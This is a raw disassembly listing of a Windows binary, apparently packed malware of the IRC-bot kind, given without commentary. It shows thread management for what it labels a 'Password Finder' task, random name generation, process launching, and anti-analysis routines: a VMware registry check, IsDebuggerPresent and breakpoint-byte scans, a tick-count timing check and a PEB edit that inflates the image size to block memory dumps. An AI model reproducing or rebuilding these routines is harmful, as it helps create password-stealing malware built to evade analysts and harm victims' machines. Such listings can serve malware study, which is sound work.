add esp, 1Ch
jmp loc_40A31B
; ---------------------------------------------------------------------------
loc_40A3C3: ; CODE XREF: MEW:0040A13D�j
mov eax, [ebp-20h]
mov byte ptr [ebp-4], 2
cmp eax, ebx
jz loc_40A0BC
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_40A0BC
; ---------------------------------------------------------------------------
loc_40A3DD: ; CODE XREF: MEW:0040A0DD�j
mov eax, [ebp-1Ch]
mov byte ptr [ebp-4], 1
cmp eax, ebx
jz loc_40A03A
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_40A03A
; ---------------------------------------------------------------------------
loc_40A3F7: ; CODE XREF: MEW:0040A05B�j
mov eax, [ebp-24h]
mov [ebp-4], bl
cmp eax, ebx
jz short loc_40A407
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40A407: ; CODE XREF: MEW:0040A3FF�j
mov eax, [ebp-10h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp eax, ebx
jz short loc_40A418
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40A418: ; CODE XREF: MEW:00409FF0�j
; MEW:0040A410�j
push dword ptr [ebp-14h]
mov eax, [ebp+8]
push dword ptr [eax]
push 404110h
call sub_405185
add esp, 0Ch
push dword ptr [ebp-2Ch]
call dword_401088 ; FreeLibrary
loc_40A436: ; CODE XREF: MEW:00409FC9�j
push offset aPasswordFinder ; "Password Finder"
call sub_40A64F
push eax
call sub_40A56C
pop ecx
pop ecx
push ebx
call dword_4010EC ; ExitThread
loc_40A44F: ; CODE XREF: MEW:0040AFD7�j
; MEW:0040AFDF�j ...
mov eax, [ecx]
test eax, eax
jz short locret_40A45B
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
locret_40A45B: ; CODE XREF: MEW:0040A453�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A45C proc near ; CODE XREF: sub_404530:loc_404CE3�p
; sub_404530+B0E�p ...
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404468
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push 1
pop edi
mov [ebp+var_20], edi
xor ebx, ebx
loc_40A48A: ; CODE XREF: sub_40A45C+10B�j
cmp edi, 0Fh
jge loc_40A54A
lea esi, [edi+edi*2]
shl esi, 3
cmp dword_40B0D8[esi], ebx
jnz loc_40A563
mov [ebp+var_4], ebx
push 4
push ebx
call sub_40AC1C
pop ecx
pop ecx
mov dword_40B0DC[esi], eax
lea eax, [ebp+var_1C]
push eax
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
push ebx
push ebx
call dword_4010D4 ; CreateThread
mov dword_40B0DC[esi], eax
mov esi, [ebp+arg_8]
cmp esi, 3
jz short loc_40A50A
cmp esi, ebx
jnz short loc_40A4E1
push 0FFFFFFF1h
jmp short loc_40A503
; ---------------------------------------------------------------------------
loc_40A4E1: ; CODE XREF: sub_40A45C+7F�j
cmp esi, 1
jnz short loc_40A4EA
push 0FFFFFFFEh
jmp short loc_40A503
; ---------------------------------------------------------------------------
loc_40A4EA: ; CODE XREF: sub_40A45C+88�j
cmp esi, 2
jnz short loc_40A4F3
push 0FFFFFFFFh
jmp short loc_40A503
; ---------------------------------------------------------------------------
loc_40A4F3: ; CODE XREF: sub_40A45C+91�j
cmp esi, 4
jnz short loc_40A4FC
push 1
jmp short loc_40A503
; ---------------------------------------------------------------------------
loc_40A4FC: ; CODE XREF: sub_40A45C+9A�j
cmp esi, 5
jnz short loc_40A50A
push 2
loc_40A503: ; CODE XREF: sub_40A45C+83�j
; sub_40A45C+8C�j ...
push eax
call dword_4010B0 ; SetThreadPriority
loc_40A50A: ; CODE XREF: sub_40A45C+7B�j
; sub_40A45C+A3�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40A523
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor ebx, ebx
mov esi, [ebp+arg_8]
mov edi, [ebp+var_20]
loc_40A523: ; CODE XREF: sub_40A45C+B2�j
lea eax, [edi+edi*2]
shl eax, 3
cmp dword_40B0DC[eax], ebx
jnz short loc_40A535
xor eax, eax
jmp short loc_40A554
; ---------------------------------------------------------------------------
loc_40A535: ; CODE XREF: sub_40A45C+D3�j
mov ecx, [ebp+arg_C]
mov dword_40B0D8[eax], ecx
mov dword_40B0E8[eax], edi
mov dword_40B0EC[eax], esi
loc_40A54A: ; CODE XREF: sub_40A45C+31�j
lea eax, [edi+edi*2]
mov eax, dword_40B0DC[eax*8]
loc_40A554: ; CODE XREF: sub_40A45C+D7�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40A563: ; CODE XREF: sub_40A45C+43�j
inc edi
mov [ebp+var_20], edi
jmp loc_40A48A
sub_40A45C endp
; =============== S U B R O U T I N E =======================================
sub_40A56C proc near ; CODE XREF: sub_404530+958�p
; sub_404530+B66�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jle short locret_40A5D4
cmp eax, 0Fh
jge short locret_40A5D4
push ebx
push esi
lea esi, [eax+eax*2]
push edi
shl esi, 3
push dword_40B0E0[esi]
lea edi, dword_40B0E0[esi]
call sub_408616
xor ebx, ebx
mov [edi], ebx
push dword_40B0E4[esi]
lea edi, dword_40B0E4[esi]
call sub_408616
pop ecx
mov [edi], ebx
mov dword_40B0D8[esi], ebx
lea eax, dword_40B0DC[esi]
pop ecx
mov dword_40B0EC[esi], ebx
mov dword_40B0E8[esi], ebx
mov ecx, [eax]
push ebx
push ecx
mov [eax], ebx
call dword_4010E4 ; TerminateThread
pop edi
pop esi
pop ebx
locret_40A5D4: ; CODE XREF: sub_40A56C+7�j
; sub_40A56C+C�j
retn
sub_40A56C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5D5 proc near ; CODE XREF: sub_404530+BC7�p
var_400 = byte ptr -400h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push dword ptr [edi+4]
push dword ptr [edi]
push offset unk_4042BC
call sub_405185
add esp, 0Ch
mov esi, offset dword_40B0F4
push 1
pop ebx
loc_40A5FE: ; CODE XREF: sub_40A5D5+73�j
mov ecx, [esi-4]
test ecx, ecx
jz short loc_40A63E
mov eax, [esi]
test eax, eax
jz short loc_40A63E
push eax
lea eax, [ebp+var_400]
push dword ptr [esi+10h]
push ecx
push ebx
push offset unk_404294
push eax
call sub_40AB94
add esp, 18h
lea eax, [ebp+var_400]
push eax
push dword ptr [edi+4]
push dword ptr [edi]
push offset dword_401A48
call sub_405185
add esp, 10h
loc_40A63E: ; CODE XREF: sub_40A5D5+2E�j
; sub_40A5D5+34�j
add esi, 18h
inc ebx
cmp esi, offset dword_40B244
jl short loc_40A5FE
pop edi
pop esi
pop ebx
leave
retn
sub_40A5D5 endp
; =============== S U B R O U T I N E =======================================
sub_40A64F proc near ; CODE XREF: sub_404530+1B5�p
; sub_404530+595�p ...
arg_0 = dword ptr 4
push ebx
push esi
push edi
push 1
xor ebx, ebx
pop edi
mov esi, offset dword_40B0F0
loc_40A65C: ; CODE XREF: sub_40A64F+2D�j
mov eax, [esi]
test eax, eax
jz short loc_40A68A
push [esp+0Ch+arg_0]
push eax
call sub_40AFA4
pop ecx
test eax, eax
pop ecx
jz short loc_40A680
add esi, 18h
inc edi
cmp esi, offset byte_40B240
jl short loc_40A65C
jmp short loc_40A68A
; ---------------------------------------------------------------------------
loc_40A680: ; CODE XREF: sub_40A64F+21�j
lea eax, [edi+edi*2]
mov ebx, dword_40B0E8[eax*8]
loc_40A68A: ; CODE XREF: sub_40A64F+11�j
; sub_40A64F+2F�j
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40A64F endp
; =============== S U B R O U T I N E =======================================
sub_40A690 proc near ; CODE XREF: sub_409016+72�p
arg_0 = dword ptr 4
push offset aR_1 ; "r"
push [esp+4+arg_0]
call sub_40AC52
pop ecx
test eax, eax
pop ecx
setnz al
retn
sub_40A690 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6A6 proc near ; CODE XREF: sub_40A77F+85�p
var_34 = byte ptr -34h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 8
call sub_40AC22
push 8
push 0
push eax
mov [ebp+var_C], eax
call sub_40AC10
add esp, 10h
call sub_40AC34
push 1Ah
mov esi, offset a0123456789abcd ; "0123456789abcdefghijklmnopqrstuvwxyz"
cdq
pop ecx
lea edi, [ebp+var_34]
idiv ecx
push 9
pop ecx
rep movsd
movsb
mov ebx, edx
add bl, 61h
call sub_40AC34
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_5], al
call sub_40AC34
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_4], al
call sub_40AC34
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_3], al
call sub_40AC34
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_2], al
call sub_40AC34
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_34]
mov [ebp+var_1], al
call sub_40AC34
cdq
idiv esi
movsx eax, [ebp+edx+var_34]
push eax
movsx eax, [ebp+var_1]
push eax
movsx eax, [ebp+var_2]
push eax
movsx eax, [ebp+var_3]
push eax
movsx eax, [ebp+var_4]
push eax
movsx eax, [ebp+var_5]
push eax
movsx eax, bl
push eax
push offset aCCCCCCC ; "%c%c%c%c%c%c%c"
push [ebp+var_C]
call sub_40AB94
mov eax, [ebp+var_C]
add esp, 24h
pop edi
pop esi
pop ebx
leave
retn
sub_40A6A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A77F proc near ; CODE XREF: sub_4055A6+325�p
; sub_4055A6+368�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_404478
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov edi, [ebp+arg_0]
lea esi, [edi+1]
push esi
call sub_40AC22
mov ebx, eax
mov [ebp+var_1C], ebx
push esi
push 0
push ebx
call sub_40AC10
add esp, 10h
and [ebp+var_24], 0
loc_40A7CA: ; CODE XREF: sub_40A77F+70�j
cmp [ebp+var_24], edi
jge short loc_40A7F1
call sub_40AC34
cdq
push 1Ah
pop ecx
idiv ecx
add edx, 61h
mov [ebp+var_20], edx
lea eax, [ebp+var_20]
push eax
push ebx
call sub_40AC82
pop ecx
pop ecx
inc [ebp+var_24]
jmp short loc_40A7CA
; ---------------------------------------------------------------------------
loc_40A7F1: ; CODE XREF: sub_40A77F+4E�j
or [ebp+var_4], 0FFFFFFFFh
mov eax, ebx
jmp short loc_40A809
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
call sub_40A6A6
loc_40A809: ; CODE XREF: sub_40A77F+78�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40A77F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A818 proc near ; CODE XREF: sub_404530+5B8�p
; sub_4055A6+31F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call dword_4010FC ; GetTickCount
push eax
call sub_40AC3A
pop ecx
call sub_40AC34
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
inc eax
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul dbl_404488
call sub_40ABC6
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_40A818 endp
; =============== S U B R O U T I N E =======================================
sub_40A856 proc near ; CODE XREF: sub_407617:loc_40769E�p
push esi
call sub_40AC34
mov esi, eax
shl esi, 10h
call sub_40AC34
add eax, esi
pop esi
retn
sub_40A856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A86A proc near ; CODE XREF: sub_407617+C4�p
jmp sub_40AC34
sub_40A86A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A86F proc near ; CODE XREF: sub_4086A6+16F�p
var_400 = byte ptr -400h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push esi
push edi
push offset dword_4030FC
push [ebp+arg_0]
xor ebx, ebx
call sub_40AC52
mov edi, eax
mov esi, 400h
push edi
push esi
lea eax, [ebp+var_400]
loc_40A899: ; DATA XREF: MEW:00402930�o
; MEW:00402974�o ...
push 1
push eax
call sub_40AC4C
add esp, 18h
loc_40A8A4: ; CODE XREF: sub_40A86F+55�j
mov ecx, eax
test cx, cx
jz short loc_40A8D0
cmp cx, si
jb short loc_40A8C6
push edi
push esi
lea eax, [ebp+var_400]
push 1
push eax
inc ebx
call sub_40AC4C
add esp, 10h
jmp short loc_40A8A4
; ---------------------------------------------------------------------------
loc_40A8C6: ; CODE XREF: sub_40A86F+3F�j
test byte ptr [edi+0Ch], 10h
jnz short loc_40A8D0
xor eax, eax
jmp short loc_40A8DB
; ---------------------------------------------------------------------------
loc_40A8D0: ; CODE XREF: sub_40A86F+3A�j
; sub_40A86F+5B�j
movzx eax, bx
movzx ecx, cx
shl eax, 0Ah
add eax, ecx
loc_40A8DB: ; CODE XREF: sub_40A86F+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_40A86F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8E0 proc near ; CODE XREF: sub_408825+107�p
; sub_408825+121�p ...
var_454 = byte ptr -454h
var_54 = dword ptr -54h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = byte ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 454h
push esi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_40AC10
push 44h
lea eax, [ebp+var_54]
push esi
push eax
call sub_40AC10
add esp, 18h
lea eax, [ebp+var_454]
mov [ebp+var_54], 44h
mov [ebp+var_28], 1
push [ebp+arg_4]
mov [ebp+var_24], si
push [ebp+arg_0]
push offset aSS ; "%s %s"
push 400h
push eax
call sub_40AD78
add esp, 14h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+var_454]
push esi
push eax
push esi
call dword_4010B4 ; CreateProcessA
neg eax
sbb eax, eax
pop esi
and eax, [ebp+var_8]
leave
retn
sub_40A8E0 endp
; =============== S U B R O U T I N E =======================================
sub_40A95F proc near ; CODE XREF: sub_4055A6+573�p
; sub_4055A6+5F6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
push edi
loc_40A969: ; CODE XREF: sub_40A95F+1B�j
; sub_40A95F+44�j
mov al, [esi]
test al, al
jnz short loc_40A97C
mov al, [ecx]
test al, al
jz short loc_40A9A5
cmp al, 2Ah
jnz short loc_40A9C5
inc ecx
jmp short loc_40A969
; ---------------------------------------------------------------------------
loc_40A97C: ; CODE XREF: sub_40A95F+E�j
mov dl, [ecx]
test dl, dl
jz short loc_40A9C5
cmp al, dl
jz short loc_40A9A1
cmp al, 41h
jl short loc_40A98E
cmp al, 5Ah
jle short loc_40A996
loc_40A98E: ; CODE XREF: sub_40A95F+29�j
cmp al, 61h
jl short loc_40A99C
cmp al, 7Ah
jg short loc_40A99C
loc_40A996: ; CODE XREF: sub_40A95F+2D�j
xor al, 20h
cmp al, dl
jz short loc_40A9A1
loc_40A99C: ; CODE XREF: sub_40A95F+31�j
; sub_40A95F+35�j
cmp dl, 3Fh
jnz short loc_40A9A9
loc_40A9A1: ; CODE XREF: sub_40A95F+25�j
; sub_40A95F+3B�j
inc ecx
inc esi
jmp short loc_40A969
; ---------------------------------------------------------------------------
loc_40A9A5: ; CODE XREF: sub_40A95F+14�j
; sub_40A95F+5D�j
mov al, 1
jmp short loc_40A9C7
; ---------------------------------------------------------------------------
loc_40A9A9: ; CODE XREF: sub_40A95F+40�j
cmp byte ptr [ecx], 2Ah
jnz short loc_40A9C5
lea edi, [ecx+1]
loc_40A9B1: ; CODE XREF: sub_40A95F+64�j
push edi
push esi
call sub_40A95F
pop ecx
test al, al
pop ecx
jnz short loc_40A9A5
cmp [esi], al
jz short loc_40A9C5
inc esi
jmp short loc_40A9B1
; ---------------------------------------------------------------------------
loc_40A9C5: ; CODE XREF: sub_40A95F+18�j
; sub_40A95F+21�j ...
xor al, al
loc_40A9C7: ; CODE XREF: sub_40A95F+48�j
pop edi
pop esi
retn
sub_40A95F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9CA proc near ; CODE XREF: sub_4096C8+125�p
; sub_4096C8+149�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_40A9F8
loc_40A9DB: ; CODE XREF: sub_40A9CA+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_40AE60
add esp, 0Ch
test eax, eax
jz short loc_40A9FE
inc esi
cmp esi, edi
jl short loc_40A9DB
loc_40A9F8: ; CODE XREF: sub_40A9CA+F�j
xor al, al
loc_40A9FA: ; CODE XREF: sub_40A9CA+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40A9FE: ; CODE XREF: sub_40A9CA+27�j
mov al, 1
jmp short loc_40A9FA
sub_40A9CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA02 proc near ; CODE XREF: sub_409834+12�p
; sub_409834+23�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov ah, 41h
mov dh, 5Ah
mov esi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
mov dl, [ecx]
test dl, dl
jz short loc_40AA4C
loc_40AA17: ; CODE XREF: sub_40AA02+3F�j
mov ebx, esi
inc ebx
loc_40AA1A: ; CODE XREF: sub_40AA02+46�j
mov al, [esi]
inc esi
test al, al
jz short loc_40AA55
cmp dl, ah
jb short loc_40AA2C
cmp dl, dh
ja short loc_40AA2C
add dl, 20h
loc_40AA2C: ; CODE XREF: sub_40AA02+21�j
; sub_40AA02+25�j
cmp al, ah
jb short loc_40AA36
cmp al, dh
ja short loc_40AA36
add al, 20h
loc_40AA36: ; CODE XREF: sub_40AA02+2C�j
; sub_40AA02+30�j
cmp al, dl
jz short loc_40AA43
mov esi, ebx
mov ecx, [ebp+arg_4]
mov dl, [ecx]
jmp short loc_40AA17
; ---------------------------------------------------------------------------
loc_40AA43: ; CODE XREF: sub_40AA02+36�j
inc ecx
mov dl, [ecx]
test dl, dl
jnz short loc_40AA1A
jmp short loc_40AA50
; ---------------------------------------------------------------------------
loc_40AA4C: ; CODE XREF: sub_40AA02+13�j
mov eax, esi
jmp short loc_40AA59
; ---------------------------------------------------------------------------
loc_40AA50: ; CODE XREF: sub_40AA02+48�j
dec ebx
mov eax, ebx
jmp short loc_40AA59
; ---------------------------------------------------------------------------
loc_40AA55: ; CODE XREF: sub_40AA02+1D�j
xor eax, eax
jmp short $+2
loc_40AA59: ; CODE XREF: sub_40AA02+4C�j
; sub_40AA02+51�j
pop esi
pop ebx
pop ebp
retn
sub_40AA02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA5D proc near ; CODE XREF: sub_40933F+19�p
; sub_40AAA5+C�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push 0
push offset aSoftwareVmware ; "SOFTWARE\\VMware, Inc.\\"
push 80000002h
call dword_401010
test eax, eax
jnz short loc_40AA8D
push [ebp+var_4]
call dword_401018
mov al, 1
leave
retn
; ---------------------------------------------------------------------------
loc_40AA8D: ; CODE XREF: sub_40AA5D+21�j
xor al, al
leave
retn
sub_40AA5D endp
; =============== S U B R O U T I N E =======================================
sub_40AA91 proc near ; CODE XREF: sub_40AAA5:loc_40AAEB�p
mov eax, large fs:30h
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
add dword ptr [eax+20h], 2000h
retn
sub_40AA91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AAA5 proc near ; CODE XREF: sub_405CEC:loc_405D67�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
push ebx
push esi
push edi
call sub_40AA5D
test al, al
jz short loc_40AAC1
loc_40AABA: ; CODE XREF: sub_40AAA5+6B�j
; sub_40AAA5+8D�j ...
mov al, 1
jmp loc_40AB4B
; ---------------------------------------------------------------------------
loc_40AAC1: ; CODE XREF: sub_40AAA5+13�j
mov esi, offset aKernel32_dll ; "KERNEL32.DLL"
push esi
call dword_4010C8 ; GetModuleHandleA
test eax, eax
jnz short loc_40AADC
push esi
call dword_401090 ; LoadLibraryA
test eax, eax
jz short loc_40AAEB
loc_40AADC: ; CODE XREF: sub_40AAA5+2A�j
push offset aIsdebuggerpres ; "IsDebuggerPresent"
push eax
call dword_40108C ; GetProcAddress
mov [ebp+var_4], eax
loc_40AAEB: ; CODE XREF: sub_40AAA5+35�j
call sub_40AA91
mov edi, dword_4010FC
call edi ; dword_4010FC
mov ebx, eax
mov esi, offset sub_40AB50
mov al, [esi]
cmp al, 0CCh
jz short loc_40AB09
xor eax, eax
jmp short loc_40AB0E
; ---------------------------------------------------------------------------
loc_40AB09: ; CODE XREF: sub_40AAA5+5E�j
mov eax, 1
loc_40AB0E: ; CODE XREF: sub_40AAA5+62�j
test al, al
jnz short loc_40AABA
cmp [ebp+var_4], 0
jz short loc_40AB3F
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
mov esi, [ebp+var_8]
mov al, [esi]
cmp al, 0CCh
jz short loc_40AB2B
xor eax, eax
jmp short loc_40AB30
; ---------------------------------------------------------------------------
loc_40AB2B: ; CODE XREF: sub_40AAA5+80�j
mov eax, 1
loc_40AB30: ; CODE XREF: sub_40AAA5+84�j
test al, al
jnz short loc_40AABA
call [ebp+var_4]
test eax, eax
jnz loc_40AABA
loc_40AB3F: ; CODE XREF: sub_40AAA5+71�j
call edi ; dword_4010FC
sub eax, ebx
cmp eax, 1388h
setnbe al
loc_40AB4B: ; CODE XREF: sub_40AAA5+17�j
pop edi
pop esi
pop ebx
leave
retn
sub_40AAA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB50 proc near ; DATA XREF: sub_40AAA5+55�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
mov al, [esi]
cmp al, 0CCh
jz short loc_40AB61
xor eax, eax
jmp short loc_40AB66
; ---------------------------------------------------------------------------
loc_40AB61: ; CODE XREF: sub_40AB50+B�j
mov eax, 1
loc_40AB66: ; CODE XREF: sub_40AB50+F�j
pop esi
pop ebp
retn
sub_40AB50 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AB6A proc near ; CODE XREF: MEW:00407057�p
; MEW:004070AE�p ...
jmp dword_4011B8
sub_40AB6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AB70 proc near ; CODE XREF: MEW:00407048�p
; MEW:0040708E�p
jmp dword_4011B4
sub_40AB70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AB76 proc near ; CODE XREF: MEW:00406FAF�p
; MEW:00407063�p
jmp dword_4011B0
sub_40AB76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AB7C proc near ; CODE XREF: MEW:00406FA3�p
jmp dword_4011AC
sub_40AB7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AB82 proc near ; CODE XREF: MEW:00406F14�p
jmp dword_4011A8
sub_40AB82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AB88 proc near ; CODE XREF: MEW:00406EF7�p
; MEW:00406F2E�p
jmp dword_4011A4
sub_40AB88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AB8E proc near ; CODE XREF: sub_404530+A04�p
; sub_404530+A37�p
jmp dword_401138
sub_40AB8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AB94 proc near ; CODE XREF: sub_404530+6AE�p
; sub_404530+9B3�p ...
jmp dword_40113C
sub_40AB94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AB9A proc near ; CODE XREF: sub_404530+689�p
; sub_404530+692�p ...
jmp dword_401140
sub_40AB9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40ABA0 proc near ; CODE XREF: sub_404530+673�p
; sub_4055A6+6A�p ...
jmp dword_401144
sub_40ABA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40ABA6 proc near ; CODE XREF: sub_404530+659�p
jmp dword_401148
sub_40ABA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40ABAC proc near ; CODE XREF: sub_404530+5F4�p
; sub_404530+6ED�p ...
jmp dword_40114C
sub_40ABAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40ABB2 proc near ; CODE XREF: sub_404530+7B�p
; sub_404530+A0�p ...
jmp dword_401150
sub_40ABB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40ABB8 proc near ; CODE XREF: sub_404530+3A�p
; sub_404530+59�p ...
jmp dword_401154
sub_40ABB8 endp
; ---------------------------------------------------------------------------
align 10h
loc_40ABC0: ; DATA XREF: sub_404530+A�o
; sub_405185+A�o ...
jmp dword_401158
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40ABC6 proc near ; CODE XREF: sub_404530+471�p
; sub_404530+477�p ...
jmp dword_40115C
sub_40ABC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40ABCC proc near ; CODE XREF: sub_405185+5F�p
jmp dword_401160
sub_40ABCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40ABD2 proc near ; CODE XREF: sub_405185+37�p
; sub_405185+A5�p ...
jmp dword_401164
sub_40ABD2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40ABE0 proc near ; CODE XREF: sub_405185+24�p
; sub_4055A6+3C�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_40AC00
loc_40ABEC: ; CODE XREF: sub_40ABE0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_40ABEC
loc_40AC00: ; CODE XREF: sub_40ABE0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_40ABE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC10 proc near ; CODE XREF: sub_4052A5+EE�p
; sub_4055A6+456�p ...
jmp dword_401168
sub_40AC10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC16 proc near ; CODE XREF: sub_405421+37�p
; sub_40549A+AA�p ...
jmp dword_40116C
sub_40AC16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC1C proc near ; CODE XREF: sub_40549A+50�p
; sub_40A45C+4F�p
jmp dword_401170
sub_40AC1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC22 proc near ; CODE XREF: sub_40549A+33�p
; sub_407282+C5�p ...
jmp dword_401174
sub_40AC22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC28 proc near ; CODE XREF: sub_4055A6+4B2�p
; sub_4055A6+4EB�p ...
jmp dword_401178
sub_40AC28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC2E proc near ; CODE XREF: sub_405DB7+13B�p
; sub_405DB7+14E�p ...
jmp dword_40117C
sub_40AC2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC34 proc near ; CODE XREF: sub_407125+E�p
; sub_407125+18�p ...
jmp dword_401180
sub_40AC34 endp
